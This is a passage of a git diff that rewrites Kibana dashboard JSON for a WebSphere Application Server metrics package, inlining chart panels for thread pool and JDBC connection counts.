"type": "lens" - }, - { - "id": "websphere_application_server-b8c2dff0-baec-11ec-b244-51e5cddeab04", - "name": "f087d207-2453-4b0e-a31f-43ee8d5528c4:panel_f087d207-2453-4b0e-a31f-43ee8d5528c4", - "type": "lens" - }, - { - "id": "websphere_application_server-86426870-baec-11ec-b244-51e5cddeab04", - "name": "9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0:panel_9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0", - "type": "lens" - }, - { - "id": "websphere_application_server-888801c0-bae3-11ec-b244-51e5cddeab04", - "name": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99:panel_30eb3e90-77bb-49f4-bb1f-0f06835a2d99", - "type": "lens" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Thread Count" + } + }, + "title": "Number of Threads Created and Destroyed [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", + "type": "index-pattern" + } + ] + }, + "enhancements": {} }, - { - "id": "metrics-*", - "name": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" + "gridData": { + "h": 17, + "i": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99", + "w": 23, + "x": 0, + "y": 22 }, - { - "id": "metrics-*", - "name": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99:indexpattern-datasource-layer-5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", - "type": "index-pattern" + "panelIndex": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "c135b7c4-fd05-4a15-84d3-a959e24b077b": { + "columnOrder": [ + "a9009677-9999-4611-8f21-9a19fe50cda2", + "00acd61f-00ee-4c2b-a46d-6e6ee9b09ecd", + "91f4b685-d7b8-469f-b496-143f0f130cfe" + ], + "columns": { + "00acd61f-00ee-4c2b-a46d-6e6ee9b09ecd": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.threadpool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "91f4b685-d7b8-469f-b496-143f0f130cfe", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.threadpool.name" + }, + "91f4b685-d7b8-469f-b496-143f0f130cfe": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.cleared: *" + }, + "isBucketed": false, + "label": "Cleared Threads", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.threads.cleared" + }, + "a9009677-9999-4611-8f21-9a19fe50cda2": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.cleared : * " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "91f4b685-d7b8-469f-b496-143f0f130cfe" + ], + "layerId": "c135b7c4-fd05-4a15-84d3-a959e24b077b", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "00acd61f-00ee-4c2b-a46d-6e6ee9b09ecd", + "xAccessor": "a9009677-9999-4611-8f21-9a19fe50cda2" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "Number of Cleared Threads [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c135b7c4-fd05-4a15-84d3-a959e24b077b", + "type": "index-pattern" + } + ] + } }, - { - "id": "websphere_application_server-426d3360-bae6-11ec-b244-51e5cddeab04", - "name": "52f44709-7bc3-4886-8a11-75e785a3816f:panel_52f44709-7bc3-4886-8a11-75e785a3816f", - "type": "lens" + "gridData": { + "h": 12, + "i": "52f44709-7bc3-4886-8a11-75e785a3816f", + "w": 25, + "x": 23, + "y": 27 }, - { - "id": "metrics-*", - "name": "controlGroup_1823c9ec-6346-4b88-9295-a75f2f74730d:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "52f44709-7bc3-4886-8a11-75e785a3816f", + "type": "lens", + "version": "8.3.0" + } ], - "type": "dashboard" + "refreshInterval": { + "pause": true, + "value": 0 + }, + "timeFrom": "now-15m", + "timeRestore": true, + "timeTo": "now", + "title": "[Metrics WebSphere Application Server] ThreadPool", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99:indexpattern-datasource-layer-5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_1823c9ec-6346-4b88-9295-a75f2f74730d:optionsListDataView", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "b007e627-23d4-4328-b064-3877c40ca3c3:indexpattern-datasource-layer-5b4f04cc-fca5-4e2e-b12e-a08d6a89d693", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "d7e182d4-6f2b-4e48-9985-4bfd9d792d0c:indexpattern-datasource-layer-407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "f087d207-2453-4b0e-a31f-43ee8d5528c4:indexpattern-datasource-layer-8d78bbff-634f-4aff-9c25-d3f211b564eb", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0:indexpattern-datasource-layer-1decd051-dbf6-4a80-aa20-85278fedc2d4", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99:indexpattern-datasource-layer-5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "52f44709-7bc3-4886-8a11-75e785a3816f:indexpattern-datasource-layer-c135b7c4-fd05-4a15-84d3-a959e24b077b", + "id": "metrics-*" + } + ], + "migrationVersion": { + "dashboard": "8.3.0" + }, + "coreMigrationVersion": "8.3.0" } \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-5d9b0860-b582-11ec-89b4-c91c947c1fb3.json b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-5d9b0860-b582-11ec-89b4-c91c947c1fb3.json index e932b8fc15a..95d2271a6f5 100644 --- a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-5d9b0860-b582-11ec-89b4-c91c947c1fb3.json +++ b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-5d9b0860-b582-11ec-89b4-c91c947c1fb3.json @@ -1,136 +1,724 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"9fb4cabe-4f7e-49e8-8afe-43acde518929\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"websphere_application_server.jdbc.data_source\",\"title\":\"Data Source\",\"id\":\"9fb4cabe-4f7e-49e8-8afe-43acde518929\",\"enhancements\":{}}}}" - }, - "description": "JDBC dashboard for WebSphere Application Server Metrics.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "websphere_application_server-5d9b0860-b582-11ec-89b4-c91c947c1fb3", + "type": "dashboard", + "namespaces": [ + "default" + ], + "updated_at": "2023-11-07T17:50:18.506Z", + "version": "WzQyMiwxXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"9fb4cabe-4f7e-49e8-8afe-43acde518929\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"websphere_application_server.jdbc.data_source\",\"title\":\"Data Source\",\"id\":\"9fb4cabe-4f7e-49e8-8afe-43acde518929\",\"enhancements\":{}}}}" + }, + "description": "JDBC dashboard for WebSphere Application Server Metrics.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "5cb0751e-cee8-41d7-a221-1c89264c3c7e": { + "columnOrder": [ + "acf862f8-f0e1-482c-a70d-1599b559ba14", + "005f5de3-8a9a-4e48-8f85-293f2a8b283a", + "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9" + ], + "columns": { + "005f5de3-8a9a-4e48-8f85-293f2a8b283a": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.jdbc.data_source", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.jdbc.data_source" + }, + "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.total.operations_calls: *" + }, + "isBucketed": false, + "label": "Total operations calls", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.total.operations_calls" + }, + "acf862f8-f0e1-482c-a70d-1599b559ba14": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } } - } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.total.operations_calls > 0" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9" + ], + "layerId": "5cb0751e-cee8-41d7-a221-1c89264c3c7e", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "005f5de3-8a9a-4e48-8f85-293f2a8b283a", + "xAccessor": "acf862f8-f0e1-482c-a70d-1599b559ba14" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "Number of Operation Calls [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5cb0751e-cee8-41d7-a221-1c89264c3c7e", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 12, + "i": "afecf39d-0a9d-4d47-9ad4-c85a8e0efc99", + "w": 22, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 12, - "i": "afecf39d-0a9d-4d47-9ad4-c85a8e0efc99", - "w": 22, - "x": 0, - "y": 0 - }, - "panelIndex": "afecf39d-0a9d-4d47-9ad4-c85a8e0efc99", - "panelRefName": "panel_afecf39d-0a9d-4d47-9ad4-c85a8e0efc99", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 17, - "i": "51bf1823-c26b-44d8-8776-b6b3635b5d75", - "w": 26, - "x": 22, - "y": 0 - }, - "panelIndex": "51bf1823-c26b-44d8-8776-b6b3635b5d75", - "panelRefName": "panel_51bf1823-c26b-44d8-8776-b6b3635b5d75", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "133482d2-129b-42c8-b785-576e02815b22", - "w": 22, - "x": 0, - "y": 12 - }, - "panelIndex": "133482d2-129b-42c8-b785-576e02815b22", - "panelRefName": "panel_133482d2-129b-42c8-b785-576e02815b22", - "title": "Number of Free Connections [Metrics WebSphere Application Server]", - "type": "lens", - "version": "8.3.0" + "panelIndex": "afecf39d-0a9d-4d47-9ad4-c85a8e0efc99", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "6a787cb2-6500-4f46-bcc0-56ba379b2ec1": { + "columnOrder": [ + "6e346b5c-b6b3-4e66-ad29-3621b6165b6c", + "9c631c61-9a76-4650-90fe-b481257c028e", + "25cdb2ff-2d42-4703-9419-2375ef16c439", + "00acb34f-ae34-439a-9cb7-45a09bb69e15", + "03351030-51ad-4c19-9e9e-9a550b2e23e4", + "e7bed513-0fe1-460d-affc-4186777ff41a" + ], + "columns": { + "00acb34f-ae34-439a-9cb7-45a09bb69e15": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.closed: *" + }, + "isBucketed": false, + "label": "Closed Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.closed" + }, + "03351030-51ad-4c19-9e9e-9a550b2e23e4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.allocated: *" + }, + "isBucketed": false, + "label": "Allocated Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.allocated" + }, + "25cdb2ff-2d42-4703-9419-2375ef16c439": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.created: *" + }, + "isBucketed": false, + "label": "Created Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.created" + }, + "6e346b5c-b6b3-4e66-ad29-3621b6165b6c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "9c631c61-9a76-4650-90fe-b481257c028e": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.jdbc.data_source", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "03351030-51ad-4c19-9e9e-9a550b2e23e4", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.jdbc.data_source" + }, + "e7bed513-0fe1-460d-affc-4186777ff41a": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.returned: *" + }, + "isBucketed": false, + "label": "Returned Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.returned" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.created > 0 or websphere_application_server.jdbc.connection.closed > 0 or websphere_application_server.jdbc.connection.allocated > 0 or websphere_application_server.jdbc.connection.returned > 0" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "25cdb2ff-2d42-4703-9419-2375ef16c439", + "00acb34f-ae34-439a-9cb7-45a09bb69e15", + "03351030-51ad-4c19-9e9e-9a550b2e23e4", + "e7bed513-0fe1-460d-affc-4186777ff41a" + ], + "layerId": "6a787cb2-6500-4f46-bcc0-56ba379b2ec1", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "9c631c61-9a76-4650-90fe-b481257c028e", + "xAccessor": "6e346b5c-b6b3-4e66-ad29-3621b6165b6c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Count" + } }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 12, - "i": "bd9b0066-03c7-4477-a479-f47350a28d14", - "w": 26, - "x": 22, - "y": 17 - }, - "panelIndex": "bd9b0066-03c7-4477-a479-f47350a28d14", - "panelRefName": "panel_bd9b0066-03c7-4477-a479-f47350a28d14", - "type": "lens", - "version": "8.3.0" - } - ], - "refreshInterval": { - "pause": true, - "value": 0 + "title": "Number of Created, Closed, Allocated and Returned Connections [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6a787cb2-6500-4f46-bcc0-56ba379b2ec1", + "type": "index-pattern" + } + ] + } }, - "timeFrom": "now-15m", - "timeRestore": true, - "timeTo": "now", - "title": "[Metrics WebSphere Application Server] JDBC", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-5d9b0860-b582-11ec-89b4-c91c947c1fb3", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "websphere_application_server-37972440-b49d-11ec-9a7c-ef3101c300f1", - "name": "afecf39d-0a9d-4d47-9ad4-c85a8e0efc99:panel_afecf39d-0a9d-4d47-9ad4-c85a8e0efc99", - "type": "lens" + "gridData": { + "h": 17, + "i": "51bf1823-c26b-44d8-8776-b6b3635b5d75", + "w": 26, + "x": 22, + "y": 0 }, - { - "id": "websphere_application_server-3b877140-b49d-11ec-9a7c-ef3101c300f1", - "name": "51bf1823-c26b-44d8-8776-b6b3635b5d75:panel_51bf1823-c26b-44d8-8776-b6b3635b5d75", - "type": "lens" + "panelIndex": "51bf1823-c26b-44d8-8776-b6b3635b5d75", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "093d1982-684a-40db-bed9-9426559b90ee": { + "columnOrder": [ + "5df21f55-a6e2-439c-a15d-3d1d63f30b67", + "aaf7723c-6ca8-4015-864d-8263d7488d72", + "a2c8801f-9e82-4502-a4db-8290bf4b4b7e" + ], + "columns": { + "5df21f55-a6e2-439c-a15d-3d1d63f30b67": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "a2c8801f-9e82-4502-a4db-8290bf4b4b7e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.free: *" + }, + "isBucketed": false, + "label": "Free Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.free" + }, + "aaf7723c-6ca8-4015-864d-8263d7488d72": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.jdbc.data_source", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "a2c8801f-9e82-4502-a4db-8290bf4b4b7e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.jdbc.data_source" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "a2c8801f-9e82-4502-a4db-8290bf4b4b7e" + ], + "layerId": "093d1982-684a-40db-bed9-9426559b90ee", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "aaf7723c-6ca8-4015-864d-8263d7488d72", + "xAccessor": "5df21f55-a6e2-439c-a15d-3d1d63f30b67" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "Number of Free Connections [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-093d1982-684a-40db-bed9-9426559b90ee", + "type": "index-pattern" + } + ] + } }, - { - "id": "websphere_application_server-3fe9e100-b49d-11ec-9a7c-ef3101c300f1", - "name": "133482d2-129b-42c8-b785-576e02815b22:panel_133482d2-129b-42c8-b785-576e02815b22", - "type": "lens" + "gridData": { + "h": 17, + "i": "133482d2-129b-42c8-b785-576e02815b22", + "w": 22, + "x": 0, + "y": 12 }, - { - "id": "websphere_application_server-443e1ff0-b49d-11ec-9a7c-ef3101c300f1", - "name": "bd9b0066-03c7-4477-a479-f47350a28d14:panel_bd9b0066-03c7-4477-a479-f47350a28d14", - "type": "lens" + "panelIndex": "133482d2-129b-42c8-b785-576e02815b22", + "title": "Number of Free Connections [Metrics WebSphere Application Server]", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "f73c674c-32f9-437c-9556-c02eef1a0871": { + "columnOrder": [ + "c4abbc8f-c0f8-43de-aae9-ceeff9026807", + "880644a5-cf8e-4cd1-a607-0982600b03fa", + "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea" + ], + "columns": { + "880644a5-cf8e-4cd1-a607-0982600b03fa": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.jdbc.data_source", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.jdbc.data_source" + }, + "c4abbc8f-c0f8-43de-aae9-ceeff9026807": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.total.in_use: *" + }, + "isBucketed": false, + "label": "Total Connections In Use", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.total.in_use" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.total.in_use >0" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea" + ], + "layerId": "f73c674c-32f9-437c-9556-c02eef1a0871", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "880644a5-cf8e-4cd1-a607-0982600b03fa", + "xAccessor": "c4abbc8f-c0f8-43de-aae9-ceeff9026807" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "Total Connections In Use [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f73c674c-32f9-437c-9556-c02eef1a0871", + "type": "index-pattern" + } + ] + } }, - { - "id": "metrics-*", - "name": "controlGroup_9fb4cabe-4f7e-49e8-8afe-43acde518929:optionsListDataView", - "type": "index-pattern" - } + "gridData": { + "h": 12, + "i": "bd9b0066-03c7-4477-a479-f47350a28d14", + "w": 26, + "x": 22, + "y": 17 + }, + "panelIndex": "bd9b0066-03c7-4477-a479-f47350a28d14", + "type": "lens", + "version": "8.3.0" + } ], - "type": "dashboard" + "refreshInterval": { + "pause": true, + "value": 0 + }, + "timeFrom": "now-15m", + "timeRestore": true, + "timeTo": "now", + "title": "[Metrics WebSphere Application Server] JDBC", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "controlGroup_9fb4cabe-4f7e-49e8-8afe-43acde518929:optionsListDataView", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "afecf39d-0a9d-4d47-9ad4-c85a8e0efc99:indexpattern-datasource-layer-5cb0751e-cee8-41d7-a221-1c89264c3c7e", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "51bf1823-c26b-44d8-8776-b6b3635b5d75:indexpattern-datasource-layer-6a787cb2-6500-4f46-bcc0-56ba379b2ec1", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "133482d2-129b-42c8-b785-576e02815b22:indexpattern-datasource-layer-093d1982-684a-40db-bed9-9426559b90ee", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "bd9b0066-03c7-4477-a479-f47350a28d14:indexpattern-datasource-layer-f73c674c-32f9-437c-9556-c02eef1a0871", + "id": "metrics-*" + } + ], + "migrationVersion": { + "dashboard": "8.3.0" + }, + "coreMigrationVersion": "8.3.0" } \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-b8da46b0-b595-11ec-888d-b1230de080fd.json b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-b8da46b0-b595-11ec-888d-b1230de080fd.json index adea1efff97..31ff3e95a82 100644 --- a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-b8da46b0-b595-11ec-888d-b1230de080fd.json +++ b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-b8da46b0-b595-11ec-888d-b1230de080fd.json @@ -1,96 +1,485 @@ { - "attributes": { - "description": "Servlet dashboard for WebSphere Application Server Metrics.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "websphere_application_server-b8da46b0-b595-11ec-888d-b1230de080fd", + "type": "dashboard", + "namespaces": [ + "default" + ], + "updated_at": "2023-11-07T17:50:18.506Z", + "version": "WzQyMywxXQ==", + "attributes": { + "description": "Servlet dashboard for WebSphere Application Server Metrics.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, 